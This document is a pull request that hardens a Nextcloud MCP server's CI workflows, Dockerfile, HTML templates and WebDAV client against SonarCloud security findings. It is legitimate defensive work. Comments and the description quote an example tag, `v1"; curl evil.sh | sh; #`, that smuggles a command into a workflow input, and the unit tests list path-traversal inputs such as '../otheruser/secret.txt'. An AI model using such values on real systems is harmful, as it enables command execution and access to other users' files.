### PR TITLE
fix(security): close the Sonar BLOCKER/MAJOR findings in our own code

### DIFF
--- a/.github/scripts/install-pact-cli.sh
+++ b/.github/scripts/install-pact-cli.sh
@@ -1,0 +1,32 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+# Install the unified pact CLI (Rust, pact-foundation/pact-cli) — replaces the
+# deprecated pact-ruby-standalone `pact-broker` CLI (which only warns now and is
+# no longer maintained). The cargo-dist installer appends its bin dir
+# ($HOME/.pact/bin) to $GITHUB_PATH, so `pact` is on PATH for the broker steps
+# that follow.
+#
+# The installer is downloaded, checksum-verified, and only then executed. It
+# used to be piped straight into `sh` from three separate workflow steps, which
+# executed unverified remote code and allowed a redirect to drop to plain HTTP
+# (githubactions:S8482 / S6506). Bump PACT_INSTALLER_SHA256 alongside
+# PACT_CLI_VERSION:
+#
+#   curl -fsSL https://github.com/pact-foundation/pact-cli/releases/download/<ver>/pact-installer.sh | sha256sum
+
+PACT_CLI_VERSION="v0.10.7"
+PACT_INSTALLER_SHA256="44af8d4cf54419efbccd980ce273c3658a15426b32049b9647523a3dca1de758"
+
+installer="$(mktemp)"
+trap 'rm -f "$installer"' EXIT
+
+curl --proto '=https' --tlsv1.2 -fsSL \
+    "https://github.com/pact-foundation/pact-cli/releases/download/${PACT_CLI_VERSION}/pact-installer.sh" \
+    -o "$installer"
+
+echo "${PACT_INSTALLER_SHA256}  ${installer}" | sha256sum --check --strict
+
+sh "$installer"
+echo "$HOME/.pact/bin" >> "$GITHUB_PATH"
+"$HOME/.pact/bin/pact" --help > /dev/null

--- a/.github/workflows/bump-version.yml
+++ b/.github/workflows/bump-version.yml
@@ -33,10 +33,11 @@ jobs:
         with:
           python-version: '3.11'
 
+      # The pinned action replaces `curl https://astral.sh/uv/install.sh | sh`,
+      # which piped an unverified script straight into a shell
+      # (githubactions:S8482/S6506). Same action, same pin as pact.yml.
       - name: Install uv
-        run: |
-          curl -LsSf https://astral.sh/uv/install.sh | sh
-          echo "$HOME/.cargo/bin" >> $GITHUB_PATH
+        uses: astral-sh/setup-uv@c771a70e6277c0a99b617c7a806ffedaca235ff9 # v9.0.0
 
       - name: Configure git
         run: |

--- a/.github/workflows/docker-build-publish.yml
+++ b/.github/workflows/docker-build-publish.yml
@@ -23,9 +23,14 @@ jobs:
     steps:
       - name: Resolve tag
         id: resolve
+        # INPUT_TAG is caller-controlled, so it goes through the environment
+        # rather than being interpolated into the script body, where a tag like
+        # `v1"; curl evil.sh | sh; #` would execute (githubactions:S7630).
+        env:
+          INPUT_TAG: ${{ inputs.tag }}
         run: |
-          if [ -n "${{ inputs.tag }}" ]; then
-            TAG="${{ inputs.tag }}"
+          if [ -n "$INPUT_TAG" ]; then
+            TAG="$INPUT_TAG"
           else
             TAG="${GITHUB_REF#refs/tags/}"
           fi

--- a/.github/workflows/pact-record-deployment.yml
+++ b/.github/workflows/pact-record-deployment.yml
@@ -47,6 +47,10 @@ jobs:
       contents: read
     timeout-minutes: 5
     steps:
+      # Needed for .github/scripts/install-pact-cli.sh; this job previously ran
+      # without a working copy.
+      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
+
       - name: Join tailnet
         if: ${{ env.PACT_BROKER != '' }}
         uses: tailscale/github-action@306e68a486fd2350f2bfc3b19fcd143891a4a2d8 # v4
@@ -57,15 +61,7 @@ jobs:
 
       - name: Install Pact CLI
         if: ${{ env.PACT_BROKER != '' }}
-        run: |
-          # Unified pact CLI (Rust, pact-foundation/pact-cli) — replaces the
-          # deprecated pact-ruby-standalone `pact-broker` CLI (which only warns
-          # now and is no longer maintained). The cargo-dist installer appends
-          # its bin dir ($HOME/.pact/bin) to $GITHUB_PATH, so `pact` is on PATH
-          # for the record-deployment step below.
-          curl -fsSL https://github.com/pact-foundation/pact-cli/releases/download/v0.10.7/pact-installer.sh | sh
-          echo "$HOME/.pact/bin" >> "$GITHUB_PATH"
-          "$HOME/.pact/bin/pact" --help > /dev/null
+        run: .github/scripts/install-pact-cli.sh
 
       - name: Record deployment to production
         if: ${{ env.PACT_BROKER != '' }}

--- a/.github/workflows/pact.yml
+++ b/.github/workflows/pact.yml
@@ -40,7 +40,7 @@ jobs:
         uses: astral-sh/setup-uv@c771a70e6277c0a99b617c7a806ffedaca235ff9 # v9.0.0
 
       - name: Generate consumer pacts
-        run: uv run pytest -v -m contract tests/contract/
+        run: uv run --frozen pytest -v -m contract tests/contract/
 
       # Only publish from non-fork builds that have the broker secrets.
       - name: Join tailnet
@@ -57,15 +57,7 @@ jobs:
 
       - name: Install Pact CLI
         if: ${{ env.PACT_BROKER != '' }}
-        run: |
-          # Unified pact CLI (Rust, pact-foundation/pact-cli) — replaces the
-          # deprecated pact-ruby-standalone `pact-broker` CLI (which only warns
-          # now and is no longer maintained). The cargo-dist installer appends
-          # its bin dir ($HOME/.pact/bin) to $GITHUB_PATH, so `pact` is on PATH
-          # for the broker steps below.
-          curl -fsSL https://github.com/pact-foundation/pact-cli/releases/download/v0.10.7/pact-installer.sh | sh
-          echo "$HOME/.pact/bin" >> "$GITHUB_PATH"
-          "$HOME/.pact/bin/pact" --help > /dev/null
+        run: .github/scripts/install-pact-cli.sh
 
       # Guard the migration: only `publish` runs on a PR (can-i-deploy is
       # master-only, record-deployment is tag-only), so assert here that the
@@ -171,9 +163,9 @@ jobs:
         # the gate is preserved; publishing the same provider version twice is
         # idempotent in the broker.
         run: |
-          uv run pytest -v -m contract tests/contract/test_mcp_provider_verification.py && exit 0
+          uv run --frozen pytest -v -m contract tests/contract/test_mcp_provider_verification.py && exit 0
           echo "::warning title=Retrying provider verification::First attempt failed; retrying once to rule out a transient broker/tailnet error."
-          uv run pytest -v -m contract tests/contract/test_mcp_provider_verification.py
+          uv run --frozen pytest -v -m contract tests/contract/test_mcp_provider_verification.py
 
   can-i-deploy:
     name: can-i-deploy
@@ -206,15 +198,7 @@ jobs:
 
       - name: Install Pact CLI
         if: ${{ env.PACT_BROKER != '' }}
-        run: |
-          # Unified pact CLI (Rust, pact-foundation/pact-cli) — replaces the
-          # deprecated pact-ruby-standalone `pact-broker` CLI (which only warns
-          # now and is no longer maintained). The cargo-dist installer appends
-          # its bin dir ($HOME/.pact/bin) to $GITHUB_PATH, so `pact` is on PATH
-          # for the broker steps below.
-          curl -fsSL https://github.com/pact-foundation/pact-cli/releases/download/v0.10.7/pact-installer.sh | sh
-          echo "$HOME/.pact/bin" >> "$GITHUB_PATH"
-          "$HOME/.pact/bin/pact" --help > /dev/null
+        run: .github/scripts/install-pact-cli.sh
 
       # SHADOW MODE: run can-i-deploy for signal but never fail the workflow.
       # The broker's `production` environment is populated by the

--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -25,9 +25,14 @@ jobs:
     steps:
       - name: Resolve tag
         id: resolve
+        # INPUT_TAG is caller-controlled, so it goes through the environment
+        # rather than being interpolated into the script body, where a tag like
+        # `v1"; curl evil.sh | sh; #` would execute (githubactions:S7630).
+        env:
+          INPUT_TAG: ${{ inputs.tag }}
         run: |
-          if [ -n "${{ inputs.tag }}" ]; then
-            TAG="${{ inputs.tag }}"
+          if [ -n "$INPUT_TAG" ]; then
+            TAG="$INPUT_TAG"
           else
             TAG="${GITHUB_REF#refs/tags/}"
           fi

--- a/Dockerfile
+++ b/Dockerfile
@@ -16,7 +16,11 @@ WORKDIR /app
 
 COPY pyproject.toml uv.lock README.md .
 
-RUN uv sync --locked --no-dev --no-install-project --no-cache --extra postgres --extra observability
+# --no-build: every third-party dependency must arrive as a wheel, so no
+# dependency's setup.py executes at image-build time (docker:S8541). This is
+# the sync that installs them all; the second one only adds the project itself,
+# which by definition has to be built and cannot carry the flag.
+RUN uv sync --locked --no-dev --no-install-project --no-build --no-cache --extra postgres --extra observability
 
 COPY . .
 

--- a/nextcloud_mcp_server/auth/templates/user_info.html
+++ b/nextcloud_mcp_server/auth/templates/user_info.html
@@ -3,11 +3,19 @@
 {% block title %}Nextcloud MCP Server{% endblock %}
 
 {% block extra_head %}
-    <!-- htmx for dynamic loading -->
-    <script src="https://unpkg.com/htmx.org@1.9.10"></script>
+    <!-- htmx for dynamic loading. Pinned to an exact file with a subresource
+         integrity hash: without it a compromised CDN could serve arbitrary
+         script into an authenticated page (Web:S5725). -->
+    <script src="https://unpkg.com/htmx.org@1.9.10/dist/htmx.min.js"
+            integrity="sha384-D1Kt99CQMDuVetoL1lrYwg5t+9QdHe7NLX/SoJYkXDFfX37iInKRy5xLSi8nO7UC"
+            crossorigin="anonymous"></script>
 
-    <!-- Alpine.js for state management -->
-    <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
+    <!-- Alpine.js for state management. Was pinned to the floating `3.x.x`
+         tag, which cannot carry an integrity hash because the bytes change
+         under it. -->
+    <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.14.9/dist/cdn.min.js"
+            integrity="sha384-9Ax3MmS9AClxJyd5/zafcXXjxmwFhZCdsT6HJoJjarvCaAkJlk5QDzjLJm+Wdx5F"
+            crossorigin="anonymous"></script>
 {% endblock %}
 
 {% block extra_styles %}

--- a/nextcloud_mcp_server/auth/templates/welcome.html
+++ b/nextcloud_mcp_server/auth/templates/welcome.html
@@ -3,8 +3,12 @@
 {% block title %}Welcome - Nextcloud MCP Server{% endblock %}
 
 {% block extra_head %}
-    <!-- Alpine.js for interactive elements -->
-    <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.x.x/dist/cdn.min.js"></script>
+    <!-- Alpine.js for interactive elements. Pinned with an integrity hash for
+         the same reason as user_info.html: the floating `3.x.x` tag cannot
+         carry one (Web:S5725). -->
+    <script defer src="https://cdn.jsdelivr.net/npm/alpinejs@3.14.9/dist/cdn.min.js"
+            integrity="sha384-9Ax3MmS9AClxJyd5/zafcXXjxmwFhZCdsT6HJoJjarvCaAkJlk5QDzjLJm+Wdx5F"
+            crossorigin="anonymous"></script>
 {% endblock %}
 
 {% block extra_styles %}

--- a/nextcloud_mcp_server/client/webdav.py
+++ b/nextcloud_mcp_server/client/webdav.py
@@ -142,6 +142,31 @@ def _encode_dav_path(path: str) -> str:
     return quote(path, safe="/")
 
 
+def _reject_path_traversal(path: str) -> str:
+    """Reject a DAV path that walks out of the user's home, returning it as-is.
+
+    Every WebDAV request path is built by ``WebDAVClient._webdav_path``, which
+    concatenates caller input onto ``/remote.php/dav/files/<principal>``. MCP
+    tool arguments reach that unmodified, so a path containing ``..`` segments
+    is normalised away by the URL layer *before* the request leaves us and can
+    address another user's home or the DAV root
+    (pythonsecurity:S2083). There is no legitimate use of ``..`` in a path
+    relative to one's own home, so this fails closed rather than normalising:
+    silently rewriting the path would turn a caller's mistake into a
+    successful operation on a file they did not name.
+
+    Backslashes are folded to ``/`` first — Nextcloud treats ``\\`` as a literal
+    filename character, but the URL layer does not, so ``..\\..`` must not slip
+    past a ``/``-only split.
+    """
+    if any(segment == ".." for segment in path.replace("\\", "/").split("/")):
+        raise ValueError(
+            f"Path may not contain '..' segments; it must stay within the "
+            f"user's files: {path!r}"
+        )
+    return path
+
+
 def _normalize_etag(raw: Optional[str]) -> Optional[str]:
     """Strip the quotes an ETag is transported in, so callers can pass it back.
 
@@ -305,8 +330,15 @@ class WebDAVClient(BaseNextcloudClient):
         in this client — PROPFIND/REPORT hrefs are ``unquote``d before storage,
         and MCP-tool inputs are raw). It is encoded exactly once, so passing an
         already-encoded path would double-encode it (``%20`` → ``%2520``).
+
+        Raises ``ValueError`` for a path containing ``..``. This is the single
+        chokepoint every WebDAV request path goes through, so guarding here
+        covers read/write/delete/move/copy/list at once rather than per caller.
         """
-        return f"{self._get_webdav_base_path()}/{_encode_dav_path(path.lstrip('/'))}"
+        safe_path = _reject_path_traversal(path)
+        return (
+            f"{self._get_webdav_base_path()}/{_encode_dav_path(safe_path.lstrip('/'))}"
+        )
 
     async def delete_resource(self, path: str) -> Dict[str, Any]:
         """Delete a resource (file or directory) via WebDAV DELETE."""

--- a/tests/unit/client/test_webdav.py
+++ b/tests/unit/client/test_webdav.py
@@ -593,6 +593,39 @@ def test_webdav_path_encoding(path, expected):
 
 
 @pytest.mark.unit
+@pytest.mark.parametrize(
+    "path",
+    [
+        "../otheruser/secret.txt",
+        "Documents/../../otheruser/secret.txt",
+        "/../otheruser",
+        "..",
+        "Documents/..",
+        r"Documents\..\..\otheruser",
+    ],
+)
+def test_webdav_path_rejects_traversal(path):
+    """Guarding the shared builder covers read/write/delete/move/copy/list at
+    once: '..' is normalised away by the URL layer before the request is sent,
+    so it would address another user's home under the same DAV root."""
+    client = WebDAVClient(AsyncMock(), "testuser")
+    with pytest.raises(ValueError, match=r"\.\."):
+        client._webdav_path(path)
+
+
+@pytest.mark.unit
+@pytest.mark.parametrize(
+    "path",
+    ["..hidden.txt", "Documents/..trailing", "a..b/c", "file...txt"],
+)
+def test_webdav_path_allows_dots_inside_names(path):
+    """Only a whole '..' *segment* escapes; leading/embedded dots are ordinary
+    filename characters and must still be reachable."""
+    client = WebDAVClient(AsyncMock(), "testuser")
+    assert client._webdav_path(path).startswith("/remote.php/dav/files/testuser/")
+
+
+@pytest.mark.unit
 def test_encode_dav_path_encodes_exactly_once():
     """Pins the decoded-input precondition: a literal '%' becomes '%25', so an
     already-encoded path passed in error would double-encode (caught here)."""


### PR DESCRIPTION
Second of the SonarCloud gate stack. Master's `new_security_rating` is **E**; Sonar only
grades A at **zero** vulnerabilities, so this clears every one in our own code that can be
fixed in code. The rest are argued as false-positive/accepted on the SonarCloud side (listed
at the bottom) rather than contorted around.

None of these were ever visible to a PR gate — they live on lines nobody edits.

## Fixed

| Rule | Count | What was wrong |
|---|---|---|
| `githubactions:S7630` | 4 (BLOCKER) | `${{ inputs.tag }}` interpolated into the `run` body of the `resolve-tag` steps in `release.yml` and `docker-build-publish.yml`. A caller-supplied tag like `` v1"; curl evil.sh \| sh; # `` executes. Now passed through the environment. |
| `githubactions:S8482` + `S6506` | 8 | Three steps piped the pact-cli installer straight into `sh`; `bump-version.yml` did the same with `astral.sh/uv/install.sh`. Unverified remote code, and nothing stopping a redirect to plain HTTP. |
| `githubactions:S8544` | 3 | `uv run` in `pact.yml` resolved dependencies unpinned; now `--frozen`, matching `test.yml`. |
| `pythonsecurity:S2083` | 1 (BLOCKER) | WebDAV tool paths reached the request URL unchecked — see below. |
| `Web:S5725` | 1 | htmx and Alpine loaded from CDNs with no integrity hash. |
| `docker:S8541` | 1 | `uv sync` could execute a dependency's `setup.py` at image-build time. |

### Path traversal (`pythonsecurity:S2083`)

`nc_webdav_*` tool arguments reached the DAV request path unmodified. `..` is normalised
away by the URL layer *before* the request is sent, so a path like
`../otheruser/secret.txt` resolves under `/remote.php/dav/files/` to another user's home.

Guarded in `WebDAVClient._webdav_path` — the single builder that read, write, delete,
move, copy and list all route through — rather than at the one tool Sonar happened to
flag. It fails closed instead of normalising: silently rewriting the path would turn a
caller's mistake into a successful operation on a file they did not name. Whole `..`
segments only, so `..hidden.txt` and `a..b/c` stay reachable (covered by tests).

### Pact CLI installer

The three copies move to `.github/scripts/install-pact-cli.sh` — the convention
`wait-for-pact-broker.sh` already established — which pins the version, downloads with
`--proto '=https' --tlsv1.2`, and checksum-verifies before executing.
`pact-record-deployment.yml` gains the `actions/checkout` it needs for that script (it had
none at all). uv switches to the `astral-sh/setup-uv` action already pinned elsewhere in
the repo.

### Subresource integrity

Both CDN tags are pinned with SRI hashes. Alpine was on a floating `3.x.x` tag, which
cannot carry an integrity hash, so it is now pinned to `3.14.9`. Applied to
`welcome.html` as well as the flagged `user_info.html`.

### `--no-build`

Applied to the dependency sync only. The second sync installs the project itself, which by
definition has to be built. Verified the lock resolves wheel-only on the container's
Python (3.12): `uv sync --locked --no-dev --no-install-project --no-build --extra postgres
--extra observability --dry-run`.

## To be argued on the SonarCloud side, not in code

- `githubactions:S8544` ×2 (`release.yml` smoke tests) — `uv run --no-project --with
  dist/*.whl` resolving the published metadata unpinned *is* the smoke test.
- `docker:S8541` ×1 — the project's own build.
- `python:S4423` (`config.py`) — flags `ssl.create_default_context`, which is the secure
  default. False positive.
- `pythonsecurity:S8705` ×2 (`scripts/dbquery.py`, `sqlitequery.py`) — dev-only helpers
  that already pass an argv list (no shell) and confer strictly less privilege than the
  shell invoking them.
- `shell:S5332` ×4 (`app-hooks/…/15-setup-keycloak-provider.sh`) — `http://keycloak:8080`
  inside the dev compose network.

## Testing

`ruff check`, `ruff format --check`, `ty check` and the full unit suite pass. New unit
coverage for the traversal guard (rejects 6 traversal shapes, keeps 4 dotted filenames
reachable). The workflow changes are exercised by CI itself.

---

_This PR was generated with the help of AI, and reviewed by a Human_
